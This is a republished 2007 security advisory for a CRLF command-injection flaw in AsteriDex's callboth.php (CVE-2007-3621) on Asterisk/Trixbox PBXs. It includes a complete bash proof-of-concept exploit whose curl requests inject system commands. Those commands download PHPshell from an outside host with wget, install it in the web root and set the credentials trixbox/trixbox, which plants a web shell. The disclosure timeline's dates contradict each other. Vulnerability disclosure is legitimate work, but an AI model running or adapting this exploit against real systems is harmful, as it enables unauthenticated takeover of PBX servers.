AsteriDex (Asterisk / Trixbox) remote code execution

2007.07.10
Credit: Carl Livitt
Risk: High
Local: No
Remote: Yes
CVE: CVE-2007-3621
CWE: CWE-Other


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

________________________________________________________________________ _______ Hoku Security Vulnerability Advisory ________________________________________________________________________ _______ Title: AsteriDex remote command execution Vendor URL: http://bestof.nerdvittles.com/applications/asteridex/ Type: Command injection / remote code execution Vulnerable versions: <= 3.0 Risk factor: High Popularity: Low Author: Carl Livitt Contact: carl (at) hoku.co (dot) uk [email concealed] Date: 25th June, 2007 Location: http://www.hoku.co.uk/advisories/asteridex.txt ________________________________________________________________________ _______ Description: AsteriDex is a digital rolodex for Asterisk / Trixbox PBXs. There is a command injection vulnerability which allows unauthenticated users to execute arbitrary commands on the Asterisk management console. Such access permits execution of arbitrary operating system commands as the 'asterisk' user. The software is vulnerable in its default configuration. ________________________________________________________________________ _______ Details: The script 'callboth.php' is used by AsteriDex to bridge a VOIP call between two end-points. Insufficient parameter checking is done on the variables IN and OUT, allowing a malicious user to inject arbitrary commands into the Asterisk management console. The script works by logging into the console server on port 5038/TCP on localhost. It then issues an 'Action: Originate' command which is used to setup the bridged call. The relevant code from callboth.php is: fputs ($fp, "Action: loginrn"); fputs ($fp, "Username: phpagirn"); fputs ($fp, "Secret: phpagirn"); fputs ($fp, "Events: offrnrn"); sleep(1) ; fputs ($fp, "Action: Originatern"); fputs ($fp, "Channel: $INrn"); << Command injection fputs ($fp, "Context: custom-callbothrn"); fputs ($fp, "Exten: $OUTrn"); << Command injection fputs ($fp, "Priority: 1rnrn"); $IN is set from $_GET['IN'] with no sanity checking other than a test of string length; all strings passed to $IN must be less than 100 chars, including the string 'sip/' which is prepended to $IN prior to the length check. Given sane values of $IN=123, $out=321 and $CallerID=567, the session would look like this: Action: login Username: phpagi Secret: phpagi Events: off Action: Originate Channel: 123 Context: custom-callboth Exten: 321 Priority: 1 By including CRLF characters in $IN, an attacker can inject arbitrary commands into the data stream, hijacking the authenticated session to run commands of the attackers choice. Take, for example, a $IN string containing: 190 (at) example (dot) com [email concealed]rnApplication: SystemrnData: echo pwn3d > /tmp/hoku.txtrn This would transform the session into: Action: login Username: phpagi Secret: phpagi Events: off Action: Originate Channel: 190 (at) example (dot) com [email concealed] Application: System Data: echo pwn3d > /tmp/hoku.txt Context: custom-callboth Exten: 321 Priority: 1 This would use the call manager's 'System' functionality to execute user- supplied operating system commands, in this case writing the word "pwn3d" to a file called "/tmp/hoku.txt". The rest of the session would fail because the attacker has subverted the original 'Action', rendering the remaining commands meaningless to the manager. ________________________________________________________________________ ______ Updated Versions: A patched version of AsteriDex is available from: http://bestof.nerdvittles.com/applications/asteridex/ ________________________________________________________________________ _______ Timeline: mm/dd/yyyy ---------- 06/25/2007 Vendor contacted. 06/03/2007 Vendor contacted again, response received. Details sent to vendor. 06/03/2007 Patch issued and updated version available. 06/05/2007 Advisory released. ________________________________________________________________________ _______ Hoku Security: Our aim is to give you the business assurance that you require in order to maintain a secure company infrastructure. With clients across the globe in the UK and USA, we understand the threats posed to your business and provide best of breed consulting and solutions to secure your interests and protect your bottom line. Visit http://www.hoku.co.uk for more information and contact details. ________________________________________________________________________ _______ Exploit: A proof of concept is provided. It downloads PHPshell, installs it into the root of the vulnerable Asterisk server's web directory and sets a username/password of trixbox/trixbox. It obeys the 100 char max restriction. ## ## Begin exploit ## #!/bin/bash echo Asteridex PoC Exploit (callboth.php vulnerability) echo By Carl Livitt / Hoku Security / June 2007 echo # This has to be (a) a valid SIP address, and (b) must answer when dialled. # The exploit will fail without these conditions being met. # Currently uses the Melonite SIP echo test service. SIP="190 (at) sip.melonite (dot) nu [email concealed]" # Magic number, don't change. The default installation of AsteriDex checks # for this number and fails without it. SEQ=654321 # Other stuff we need LOC=/asteridex/callboth.php OUT=123456 # Sanity if [ "$1X" == "X" ]; then echo Syntax: $0 <Host IP[:port]> echo For example: $0 www.example.com:8080 exit 1 fi # Insanity echo "[-] Exploiting host $1 - please wait" echo -n '[+]' Building shell script curl "http://$1/$LOC?SEQ=$SEQ&OUT=$OUT&IN=$SIP%0d%0aApplication:%20System%0d% 0aData:%20echo%20!/bin/sh>/tmp/t%0d%0a" &>/dev/null echo -n . curl "http://$1/$LOC?SEQ=$SEQ&OUT=$OUT&IN=$SIP%0d%0aApplication:%20System%0d% 0aData:%20echo%20%2dn%20wget%20%2dO%20x.tar.bz2%20%5c%27http://%3e%3e/tm p/t%0d%0a" &>/dev/null echo -n . curl "http://$1/$LOC?SEQ=$SEQ&OUT=$OUT&IN=$SIP%0d%0aApplication:%20System%0d% 0aData:%20echo%20%2dn%20prdownloads.sf.net/phpshell/%3e%3e/tmp/t%0d%0a" &>/dev/null echo . curl "http://$1/$LOC?SEQ=$SEQ&OUT=$OUT&IN=$SIP%0d%0aApplication:%20System%0d% 0aData:%20echo%20phpshell%2d2.1.tar.bz2%3fdownload%5c%27%3e%3e/tmp/t%0d% 0a" &>/dev/null echo '[+] Executing shell script' curl "http://$1/$LOC?SEQ=$SEQ&OUT=$OUT&IN=$SIP%0d%0aApplication:%20System%0d% 0aData:%20cd%20/tmp;chmod%20%2bx%20t;./t;tar%20jxf%20x.tar.bz2%0d%0a" &>/dev/null echo -n '[+] Setting up phpshell' curl "http://$1/$LOC?SEQ=$SEQ&OUT=$OUT&IN=$SIP%0d%0aApplication:%20System%0d% 0aData:%20cd%20cd%20/tmp;mv%20phpshell-2.1%20p%0d%0a" &>/dev/null echo -n . curl "http://$1/$LOC?SEQ=$SEQ&OUT=$OUT&IN=$SIP%0d%0aApplication:%20System%0d% 0aData:%20cd%20/tmp/p;echo%20%5c%5busers%5c%5d>config.php%0d%0a" &>/dev/null echo -n . curl "http://$1/$LOC?SEQ=$SEQ&OUT=$OUT&IN=$SIP%0d%0aApplication:%20System%0d% 0aData:%20cd%20/tmp/p;echo%20%27trixbox%3d%22trixbox%22%27>>config.php%0 d%0a" &>/dev/null echo . curl "http://$1/$LOC?SEQ=$SEQ&OUT=$OUT&IN=$SIP%0d%0aApplication:%20System%0d% 0aData:%20mv%20/tmp/p%20/var/www/html/phpshell%0d%0a" &>/dev/null # Have a nice day echo "Done! You should now be able to browse to http://$1/phpshell/phpshell.php" echo You can login with the username 'trixbox' and password 'trixbox' ## ## End Exploit ##


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top